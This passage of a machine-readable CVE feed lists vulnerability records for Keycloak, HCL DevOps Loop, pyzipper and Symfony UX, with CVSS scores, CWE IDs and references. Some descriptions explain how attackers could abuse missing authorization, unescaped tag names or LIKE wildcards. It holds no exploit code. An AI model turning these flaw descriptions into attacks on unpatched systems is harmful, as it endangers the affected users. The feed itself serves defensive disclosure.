7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:24:30.498422Z","id":"CVE-2026-16104","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-522"}]}],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16104","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501737","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-16106","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T17:17:14.510","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the admin REST API of Keycloak, a solution for identity and access management. The issue occurs when a delegated administrator attempts to remove a child role from a composite role. Due to missing authorization checks, an attacker with limited administrative permissions can remove privileged roles they are not authorized to manage, leading to a loss of access for other users and administrators."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N","baseScore":4.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:51:57.921536Z","id":"CVE-2026-16106","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16106","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501739","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-16108","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T17:17:14.653","lastModified":"2026-07-17T19:17:13.277","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the default-groups REST endpoint and realm representation of Keycloak. This component is responsible for managing groups that are automatically assigned to new users within a realm. The issue allows a delegated administrator with realm-viewing permissions to see the names and identifiers of hidden default groups, even if they lack the specific permissions to view those groups. This can lead to the exposure of sensitive organizational structures or internal group names."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:20:03.634038Z","id":"CVE-2026-16108","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16108","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501740","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-21760","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T17:17:14.780","lastModified":"2026-07-17T18:17:14.997","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DevOps Loop is affected by an Unauthorized Access to Admin Functionality (Forced Browsing) vulnerability. Improper authorization checks may allow unauthorized users to access restricted administrative functionality by directly accessing protected application endpoints."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"DevOps Loop","defaultStatus":"unaffected","versions":[{"version":"2.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:54:18.382123Z","id":"CVE-2026-21760","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-425"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132296","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2026-21761","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T17:17:14.893","lastModified":"2026-07-17T18:17:15.107","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DevOps Loop is affected by a Cross-Origin Resource Sharing (CORS) misconfiguration. Improper CORS configuration may allow unauthorized cross-origin requests, potentially exposing application resources to untrusted domains."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"DevOps Loop","defaultStatus":"unaffected","versions":[{"version":"2.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":4.2,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:53:45.450780Z","id":"CVE-2026-21761","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-942"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132296","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2026-21762","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T17:17:15.010","lastModified":"2026-07-17T18:17:15.200","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DevOps Loop is affected by missing HTTP security headers. Missing security headers may reduce browser protections against common web-based attacks such as clickjacking, MIME-type sniffing, and cross-site scripting."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"DevOps Loop","defaultStatus":"unaffected","versions":[{"version":"2.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:53:17.227497Z","id":"CVE-2026-21762","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-644"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132296","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2026-21764","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T17:17:15.123","lastModified":"2026-07-17T18:17:15.297","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"HCL DevOps Loop is affected by insufficient input validation that allows special characters where they should be restricted. This may result in unintended application behavior under certain conditions."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"DevOps Loop","defaultStatus":"unaffected","versions":[{"version":"2.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":3.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:52:57.262662Z","id":"CVE-2026-21764","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-754"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132296","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2026-44722","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:15.240","lastModified":"2026-07-17T18:45:20.713","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"pyzipper is a replacement for Python's zipfile that can read and write AES encrypted zip files. Prior to 0.4.0, a Python operator precedence bug in pyzipper/zipfile_aes.py caused the AE-2 format to never be automatically selected during encryption, causing encrypted entries to be written in AE-1 format and exposing the plaintext CRC32 checksum in the ZIP header and, for unseekable zip archives, in the datadescripter section, allowing an attacker who possesses the archive to brute-force candidate plaintexts for small or low-entropy files by comparing CRC32 values. This issue is fixed in version 0.4.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"danifus","product":"pyzipper","versions":[{"version":"< 0.4.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":6.2,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.5,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:25:00.965188Z","id":"CVE-2026-44722","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-480"}]}],"references":[{"url":"https://github.com/danifus/pyzipper/commit/93ce88e7dfd1635443197dab3fb8d477cff579ae","source":"security-advisories@github.com"},{"url":"https://github.com/danifus/pyzipper/releases/tag/v0.4.0","source":"security-advisories@github.com"},{"url":"https://github.com/danifus/pyzipper/security/advisories/GHSA-crqm-m339-7m2p","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49208","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:15.380","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.8.0 until 2.36.0 and 3.1.0, when a #[LiveProp] is typed as DateTimeInterface and no explicit format is configured, Symfony\\UX\\LiveComponent\\LiveComponentHydrator::hydrateObjectValue() falls back to new $className($value), allowing client-supplied relative strings such as now, tomorrow, or +10 years to move a writable, format-less date prop past time-based business logic checks. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":">= 2.8.0, < 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/d24d78fda6df2d5964312255943ebf3a217b79a2","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-89g7-22c8-3j23","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49209","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:15.517","lastModified":"2026-07-17T18:17:16.590","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.5.0 until 2.36.0 and 3.1.0, Symfony\\UX\\LiveComponent\\Controller\\BatchActionController::__invoke() iterates over the client-supplied actions array and issues a full HttpKernel sub-request for each entry; because the array size is never bounded, an authenticated client can submit a single _batch request containing thousands of actions and exhaust CPU, memory, and database connections on the application server. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":">= 2.5.0, < 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:26:12.348589Z","id":"CVE-2026-49209","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/95e878d5257f13d6d652ca95e3ef6bb0934d674f","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-mm82-c99c-h2cf","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49210","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:15.650","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.8.0 until 2.36.0 and 3.1.0, Symfony\\UX\\LiveComponent\\Util\\ChildComponentPartialRenderer::createHtml() interpolates the client-controlled children[id].tag value from LiveComponentSubscriber and InterceptChildComponentRenderSubscriber directly into HTML as a tag name without escaping or validation, allowing arbitrary HTML, including <script> tags, on any Live Component re-render that contains at least one child component. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":">= 2.8.0, < 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.3,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:52:49.114369Z","id":"CVE-2026-49210","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/fbc5e9a1bda7e4556be21bb1d970f382760ed9a9","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-38x5-rcv4-xf7x","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49211","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:15.790","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.2.0 until 2.36.0 and 3.1.0, Symfony\\UX\\Autocomplete\\Doctrine\\EntitySearchUtil::addSearchClause() builds the LIKE expression used by the autocomplete endpoint by wrapping the client-supplied query in %...% without escaping SQL LIKE wildcards (%, _, \\), allowing unauthenticated users to turn the public BaseEntityAutocompleteType endpoint into a broad matcher or blind boolean oracle against every column in default searchable_fields. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":">= 2.2.0, < 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:41:23.015801Z","id":"CVE-2026-49211","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA 